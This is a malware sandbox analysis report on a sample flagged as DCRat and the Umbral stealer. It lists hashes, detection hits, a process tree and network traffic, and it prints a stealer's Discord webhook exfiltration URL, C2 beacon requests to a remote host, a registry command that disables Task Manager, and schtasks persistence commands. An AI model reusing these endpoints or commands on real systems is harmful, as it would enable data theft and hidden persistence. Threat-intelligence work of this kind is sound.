dcrat | 4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7

Analysis

max time kernel
149s
max time network
155s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
05/05/2024, 01:28 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
Size

4.3MB
MD5

898a94f29edc228ce3bd2054f3d5d6dd
SHA1

f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5
SHA256

a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
SHA512

8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae
SSDEEP

49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

Score

10^/10

dcrat umbral evasion infostealer rat stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1229451067175997500/jIKKpDize9BATyGRwJszp_dngrLcH2ykCNVKA2g8DaU3tS2rFJtimCYVQM10Zmvy_yF-

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Umbral payload 3 IoCs

resource	yara_rule
behavioral1/memory/2892-0-0x0000000000400000-0x000000000084E000-memory.dmp	family_umbral
behavioral1/files/0x000d00000001224c-3.dat	family_umbral
behavioral1/memory/2508-14-0x00000000013E0000-0x0000000001420000-memory.dmp	family_umbral

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1104	2560	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	2560	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1980	2560	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	2560	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2560	schtasks.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1784	2560	schtasks.exe	38

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/2892-0-0x0000000000400000-0x000000000084E000-memory.dmp	dcrat
behavioral1/files/0x002b000000014c67-9.dat	dcrat
behavioral1/files/0x00090000000155e2-36.dat	dcrat
behavioral1/memory/1652-37-0x00000000010E0000-0x000000000132A000-memory.dmp	dcrat
behavioral1/memory/2460-62-0x0000000001160000-0x00000000013AA000-memory.dmp	dcrat
behavioral1/memory/1696-141-0x00000000000C0000-0x000000000030A000-memory.dmp	dcrat
behavioral1/memory/1436-153-0x00000000011F0000-0x000000000143A000-memory.dmp	dcrat

Disables Task Manager via registry modification
evasion

Executes dropped EXE 15 IoCs

pid	Process
2508	stealer.exe
2644	чекер dc.exe
2964	Inject.exe
1652	driverBrokercommon.exe
2460	conhost.exe
3044	conhost.exe
2504	conhost.exe
1928	conhost.exe
2712	conhost.exe
2276	conhost.exe
2336	conhost.exe
1696	conhost.exe
1436	conhost.exe
1716	conhost.exe
2820	conhost.exe

Loads dropped DLL 6 IoCs

pid	Process
2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
2604	Process not Found
2984	cmd.exe
2984	cmd.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe	driverBrokercommon.exe
File created	C:\Program Files (x86)\Windows Mail\de-DE\56085415360792	driverBrokercommon.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\inf\conhost.exe	driverBrokercommon.exe
File opened for modification	C:\Windows\inf\conhost.exe	driverBrokercommon.exe
File created	C:\Windows\inf\088424020bedd6	driverBrokercommon.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1980	schtasks.exe
1692	schtasks.exe
2576	schtasks.exe
1784	schtasks.exe
1104	schtasks.exe
1976	schtasks.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2852	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1652	driverBrokercommon.exe
1652	driverBrokercommon.exe
1652	driverBrokercommon.exe
1652	driverBrokercommon.exe
1652	driverBrokercommon.exe
1652	driverBrokercommon.exe
1652	driverBrokercommon.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
2460	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
3044	conhost.exe
2504	conhost.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeDebugPrivilege	2508	stealer.exe
Token: SeDebugPrivilege	1652	driverBrokercommon.exe
Token: SeIncreaseQuotaPrivilege	2348	wmic.exe
Token: SeSecurityPrivilege	2348	wmic.exe
Token: SeTakeOwnershipPrivilege	2348	wmic.exe
Token: SeLoadDriverPrivilege	2348	wmic.exe
Token: SeSystemProfilePrivilege	2348	wmic.exe
Token: SeSystemtimePrivilege	2348	wmic.exe
Token: SeProfSingleProcessPrivilege	2348	wmic.exe
Token: SeIncBasePriorityPrivilege	2348	wmic.exe
Token: SeCreatePagefilePrivilege	2348	wmic.exe
Token: SeBackupPrivilege	2348	wmic.exe
Token: SeRestorePrivilege	2348	wmic.exe
Token: SeShutdownPrivilege	2348	wmic.exe
Token: SeDebugPrivilege	2348	wmic.exe
Token: SeSystemEnvironmentPrivilege	2348	wmic.exe
Token: SeRemoteShutdownPrivilege	2348	wmic.exe
Token: SeUndockPrivilege	2348	wmic.exe
Token: SeManageVolumePrivilege	2348	wmic.exe
Token: 33	2348	wmic.exe
Token: 34	2348	wmic.exe
Token: 35	2348	wmic.exe
Token: SeIncreaseQuotaPrivilege	2348	wmic.exe
Token: SeSecurityPrivilege	2348	wmic.exe
Token: SeTakeOwnershipPrivilege	2348	wmic.exe
Token: SeLoadDriverPrivilege	2348	wmic.exe
Token: SeSystemProfilePrivilege	2348	wmic.exe
Token: SeSystemtimePrivilege	2348	wmic.exe
Token: SeProfSingleProcessPrivilege	2348	wmic.exe
Token: SeIncBasePriorityPrivilege	2348	wmic.exe
Token: SeCreatePagefilePrivilege	2348	wmic.exe
Token: SeBackupPrivilege	2348	wmic.exe
Token: SeRestorePrivilege	2348	wmic.exe
Token: SeShutdownPrivilege	2348	wmic.exe
Token: SeDebugPrivilege	2348	wmic.exe
Token: SeSystemEnvironmentPrivilege	2348	wmic.exe
Token: SeRemoteShutdownPrivilege	2348	wmic.exe
Token: SeUndockPrivilege	2348	wmic.exe
Token: SeManageVolumePrivilege	2348	wmic.exe
Token: 33	2348	wmic.exe
Token: 34	2348	wmic.exe
Token: 35	2348	wmic.exe
Token: SeDebugPrivilege	2460	conhost.exe
Token: SeDebugPrivilege	3044	conhost.exe
Token: SeDebugPrivilege	2504	conhost.exe
Token: SeDebugPrivilege	1928	conhost.exe
Token: SeDebugPrivilege	2712	conhost.exe
Token: SeDebugPrivilege	2276	conhost.exe
Token: SeDebugPrivilege	2336	conhost.exe
Token: SeDebugPrivilege	1696	conhost.exe
Token: SeDebugPrivilege	1436	conhost.exe
Token: SeDebugPrivilege	1716	conhost.exe
Token: SeDebugPrivilege	2820	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2892 wrote to memory of 2508	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	28
PID 2892 wrote to memory of 2508	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	28
PID 2892 wrote to memory of 2508	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	28
PID 2892 wrote to memory of 2508	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	28
PID 2892 wrote to memory of 2644	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	29
PID 2892 wrote to memory of 2644	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	29
PID 2892 wrote to memory of 2644	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	29
PID 2892 wrote to memory of 2644	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	29
PID 2892 wrote to memory of 2964	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	30
PID 2892 wrote to memory of 2964	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	30
PID 2892 wrote to memory of 2964	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	30
PID 2892 wrote to memory of 2964	2892	a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe	30
PID 2644 wrote to memory of 2536	2644	чекер dc.exe	32
PID 2644 wrote to memory of 2536	2644	чекер dc.exe	32
PID 2644 wrote to memory of 2536	2644	чекер dc.exe	32
PID 2644 wrote to memory of 2536	2644	чекер dc.exe	32
PID 2536 wrote to memory of 2984	2536	WScript.exe	33
PID 2536 wrote to memory of 2984	2536	WScript.exe	33
PID 2536 wrote to memory of 2984	2536	WScript.exe	33
PID 2536 wrote to memory of 2984	2536	WScript.exe	33
PID 2984 wrote to memory of 1652	2984	cmd.exe	35
PID 2984 wrote to memory of 1652	2984	cmd.exe	35
PID 2984 wrote to memory of 1652	2984	cmd.exe	35
PID 2984 wrote to memory of 1652	2984	cmd.exe	35
PID 2508 wrote to memory of 2348	2508	stealer.exe	36
PID 2508 wrote to memory of 2348	2508	stealer.exe	36
PID 2508 wrote to memory of 2348	2508	stealer.exe	36
PID 1652 wrote to memory of 768	1652	driverBrokercommon.exe	45
PID 1652 wrote to memory of 768	1652	driverBrokercommon.exe	45
PID 1652 wrote to memory of 768	1652	driverBrokercommon.exe	45
PID 2984 wrote to memory of 2852	2984	cmd.exe	47
PID 2984 wrote to memory of 2852	2984	cmd.exe	47
PID 2984 wrote to memory of 2852	2984	cmd.exe	47
PID 2984 wrote to memory of 2852	2984	cmd.exe	47
PID 768 wrote to memory of 940	768	cmd.exe	48
PID 768 wrote to memory of 940	768	cmd.exe	48
PID 768 wrote to memory of 940	768	cmd.exe	48
PID 768 wrote to memory of 2460	768	cmd.exe	49
PID 768 wrote to memory of 2460	768	cmd.exe	49
PID 768 wrote to memory of 2460	768	cmd.exe	49
PID 2460 wrote to memory of 1096	2460	conhost.exe	50
PID 2460 wrote to memory of 1096	2460	conhost.exe	50
PID 2460 wrote to memory of 1096	2460	conhost.exe	50
PID 2460 wrote to memory of 1216	2460	conhost.exe	51
PID 2460 wrote to memory of 1216	2460	conhost.exe	51
PID 2460 wrote to memory of 1216	2460	conhost.exe	51
PID 1096 wrote to memory of 3044	1096	WScript.exe	54
PID 1096 wrote to memory of 3044	1096	WScript.exe	54
PID 1096 wrote to memory of 3044	1096	WScript.exe	54
PID 3044 wrote to memory of 3060	3044	conhost.exe	55
PID 3044 wrote to memory of 3060	3044	conhost.exe	55
PID 3044 wrote to memory of 3060	3044	conhost.exe	55
PID 3044 wrote to memory of 1144	3044	conhost.exe	56
PID 3044 wrote to memory of 1144	3044	conhost.exe	56
PID 3044 wrote to memory of 1144	3044	conhost.exe	56
PID 3060 wrote to memory of 2504	3060	WScript.exe	57
PID 3060 wrote to memory of 2504	3060	WScript.exe	57
PID 3060 wrote to memory of 2504	3060	WScript.exe	57
PID 2504 wrote to memory of 2808	2504	conhost.exe	58
PID 2504 wrote to memory of 2808	2504	conhost.exe	58
PID 2504 wrote to memory of 2808	2504	conhost.exe	58
PID 2504 wrote to memory of 2856	2504	conhost.exe	59
PID 2504 wrote to memory of 2856	2504	conhost.exe	59
PID 2504 wrote to memory of 2856	2504	conhost.exe	59

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2892
- C:\Users\Admin\AppData\Local\Temp\stealer.exe
  "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
- C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
  "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2536
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2984
    - - C:\MsWinsessiondllNet\driverBrokercommon.exe
        
        "C:\MsWinsessiondllNet\driverBrokercommon.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:768
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:940
        
        C:\Windows\inf\conhost.exe
        
        "C:\Windows\inf\conhost.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2460
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1096
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        9⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3044
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:3060
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        11⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2504
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs"
        12⤵
        
        PID:2808
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1928
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs"
        14⤵
        
        PID:1912
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2712
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs"
        16⤵
        
        PID:1760
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs"
        18⤵
        
        PID:2832
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs"
        20⤵
        
        PID:2484
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs"
        22⤵
        
        PID:2348
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs"
        24⤵
        
        PID:2472
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1716
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs"
        26⤵
        
        PID:2960
        
        C:\Windows\inf\conhost.exe
        
        C:\Windows\inf\conhost.exe
        27⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2820
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs"
        28⤵
        
        PID:2616
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799571d0-feee-4ef0-a2bd-927a43a01780.vbs"
        28⤵
        
        PID:1704
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6139caac-670c-420e-a75c-fa399d21bd69.vbs"
        26⤵
        
        PID:108
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51387e81-ee66-446b-a46a-d0e3ed1d0595.vbs"
        24⤵
        
        PID:984
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd645dac-b7c5-44f9-a4a4-3ff1610dd827.vbs"
        22⤵
        
        PID:2344
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae17c003-b5fe-4f4f-be48-34d5b9eac8fe.vbs"
        20⤵
        
        PID:2792
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7714cb1-5e00-45fe-a1f0-ae5b007ec77b.vbs"
        18⤵
        
        PID:1772
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b02fd538-2945-43e5-a920-0034d7675f77.vbs"
        16⤵
        
        PID:2304
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5150883-ed23-4482-a854-c5a2a66d82ea.vbs"
        14⤵
        
        PID:2240
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5ac14dba-f1e7-43c2-8a6c-dda8c9a7323c.vbs"
        12⤵
        
        PID:2856
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6244d727-ed45-43e8-ad89-3c478c88af5c.vbs"
        10⤵
        
        PID:1144
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs"
        8⤵
        
        PID:1216
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:2852
- C:\Users\Admin\AppData\Local\Temp\Inject.exe
  "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
  2⤵
  - Executes dropped EXE
  PID:2964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1784

Network

DNS

gstatic.com

stealer.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

216.58.201.99
GET

https://gstatic.com/generate_204

stealer.exe

Remote address:

216.58.201.99:443

Request

GET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Content-Length: 0
Cross-Origin-Resource-Policy: cross-origin
Date: Sun, 05 May 2024 01:28:20 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

a0947008.xsph.ru

conhost.exe

Remote address:

8.8.8.8:53

Request

a0947008.xsph.ru

IN A

Response

a0947008.xsph.ru

IN A

141.8.192.103
GET

http://a0947008.xsph.ru/_Defaultwindows.php?eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:28:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
